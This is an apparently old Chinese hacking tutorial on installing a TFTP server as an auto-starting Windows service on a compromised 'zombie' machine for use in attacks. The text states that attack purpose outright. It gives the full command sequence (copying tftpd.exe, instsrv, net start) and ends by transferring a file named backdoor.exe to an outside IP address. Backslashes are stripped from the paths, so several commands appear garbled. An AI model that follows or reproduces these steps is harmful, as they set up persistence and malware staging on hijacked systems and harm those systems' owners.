我們在攻擊的過程中經(jīng)常要使用到tftp服務(wù)器，如果你不方便在你的機(jī)器上安裝tftp服務(wù)器，那么可以在肉雞上安裝，這是比較好的方法。
我們先來學(xué)習(xí)一下什么叫作TFTP.
TFTP：(TrivialFileTransferProtocol).小文件傳輸協(xié)議.
TFTP：是網(wǎng)絡(luò)應(yīng)用程序，它比FTP簡單也比FTP功能少...

就記住這么點(diǎn)基礎(chǔ)吧，學(xué)知識取精華是最重要的，如果你一定要學(xué)的很深的話，自己去看TCP/IP吧。
我們首先找到系統(tǒng)中的tftpd.exe文件，一般我們可以在%systemroot%system32dllcache目錄下找到該文件，建議把該文件copy到其他目錄。

C:>copy%systemroot%system32dllcachetftpd.exe%systemroot%system32
已復(fù)制1個文件。

我們會用Windows2000下的ResourceKits中的一個工具instsrv創(chuàng)建一個服務(wù)，instsrv的用法如下，當(dāng)然，你也可以用其他的工具來實(shí)現(xiàn)（如srvinstw，GUI方式的）。

添加一個服務(wù)，注意，該服務(wù)創(chuàng)建侯為自動啟動。
C:>instsrvtftpc:winntsystem32tftpd.exe
Theservicewassuccessfulyadded!

MakesurethatyougointotheControlPanelanduse
theServicesapplettochangetheAccountNameand
Passwordthatthisnewlyinstalledservicewilluse
foritsSecurityContext.

啟動服務(wù)
C:>netstarttftp
tftp服務(wù)正在啟動.
tftp服務(wù)已經(jīng)啟動成功。

測試服務(wù)是否正常工作
C:>tftp-i61.135.21.195PUTbackdoor.exebackdoor.exe
Transfersuccessful:4209bytesin1second,4209bytes/s

C:>dirtftpdroot
驅(qū)動器C中的卷是C
卷的序列號是1E23-1907

C:tftpdroot的目錄

2001-09-2201:14

2001-09-2201:14

..
2001-09-2201:144,209backdoor.exe
1個文件4,209字節(jié)
2個目錄94,113,792可用字節(jié)

注意，如果你上傳文件，系統(tǒng)會在%systemdrive%自動創(chuàng)建一個名為tftproot的目錄，OK，所有的工作已經(jīng)完成了！